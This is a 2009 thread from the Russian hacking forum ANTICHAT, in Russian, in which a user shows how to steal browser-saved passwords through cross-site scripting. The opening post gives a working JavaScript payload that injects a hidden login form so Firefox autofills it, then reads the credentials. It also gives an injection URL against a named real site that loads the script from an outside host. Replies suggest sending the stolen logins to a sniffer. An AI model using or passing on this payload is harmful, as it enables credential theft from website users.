HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Раскручиваем Xss( вытаскиваем пароли )
  #1  
Старый 12.04.2009, 01:13
paranoya
Новичок
Регистрация: 25.08.2007
Сообщений: 14
С нами: 9848460

Репутация: 25
По умолчанию Раскручиваем Xss( вытаскиваем пароли )

Раскручиваем Xss( вытаскиваем пароли )

Возможно для кого-то это не новость, но в паблике об этом я не читал, поэтому покажу что накопал.

Мы легко уводим из браузеров кукисы и различную информацию. Но хочется большего - паролей. И их можно получить. С помощью xss.
В браузерах есть такая фича, как запоминание паролей.
В разных браузерах механизм этого дела устроен по разному. Будем разбирать его на примере Firefox.
Как только загружается страница, проверяются сохраненные пароли для этого сайта. Если на странице есть подходящие формы, то они автоматически заполняются. А теперь - что нам мешает вытащить их с помощью xss? - ничего, что мы и делаем. Но ведь это довольно редкий случай, что на странице с xss есть форма логина. Идем дальше.
Создаем такую форму сами. И, о чудо - форма, которую мы создали с помощью xss, после загрузки заполнилась личными данными. Логином и паролем.
Разберем все на примере.

Возьмем подопытного из темы с пассивками.

Код:
http://web20.a.ua/slovo?query=[XSS]&stype=word
Смотрим форму.

Также заодно посмотрим куда можно вставить нашу форму.
получаем следующий код:

Код:
document.getElementById('radio').innerHTML = '<form action="?" method="POST"><input id="login" type="text" name="login" style="width: 0px; height: 0px; border: 0px"><input type="password" id="password" name="password" style="width: 0px; height: 0px; border: 0px"><input type='submit'></form>
interval = setInterval('check()', 100);
window.stop();

function check() {
	l = document.getElementById('login').value;
	p = document.getElementById('password').value;
	if (l!='') {
		alert(l+"/"+p);
	}
}
Все это дело пишем в файл
Код:
http://web20.a.ua/slovo?query=<script src="host.ru/file.js"></script>&stype=word
и вуаля, получаем логин и пароль.

На Лисе данный баг работает на ура.
На ИЕ(6.0) и Опере - возможен только если пользователь сам заполнит поля.
В Chrome у меня вообще опция сохранения паролей не работает. а жаль...

 
Ответить с цитированием

  #2  
Старый 12.04.2009, 13:32
DREASTY
Познающий
Регистрация: 19.11.2007
Сообщений: 81
С нами: 9724301

Репутация: 52
По умолчанию

интересно,ща проверим
 
Ответить с цитированием

  #3  
Старый 12.04.2009, 13:38
иддкд
Banned
Регистрация: 27.03.2009
Сообщений: 45
С нами: 9013286

Репутация: 142
По умолчанию

т.е. логин/пасс вылетают в алерте?
а какой смысл, если алерт увидит только жертва?
 
Ответить с цитированием

  #4  
Старый 12.04.2009, 13:40
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от иддкд  
т.е. логин/пасс вылетают в алерте?
а какой смысл, если алерт увидит только жертва?
ну как бы алерт говорит о наличии XSS только, а вставить можно и перенаправление на снифер, например, а не алерт
 
Ответить с цитированием

  #5  
Старый 27.04.2009, 02:22
m1t4ell
Новичок
Регистрация: 24.04.2009
Сообщений: 11
С нами: 8972482

Репутация: 1
По умолчанию

Pashkela прав, проще на снеф перенаправлять
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Энциклопедия уязвимых скриптов DIAgen Веб-уязвимости 519 23.09.2021 11:44
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.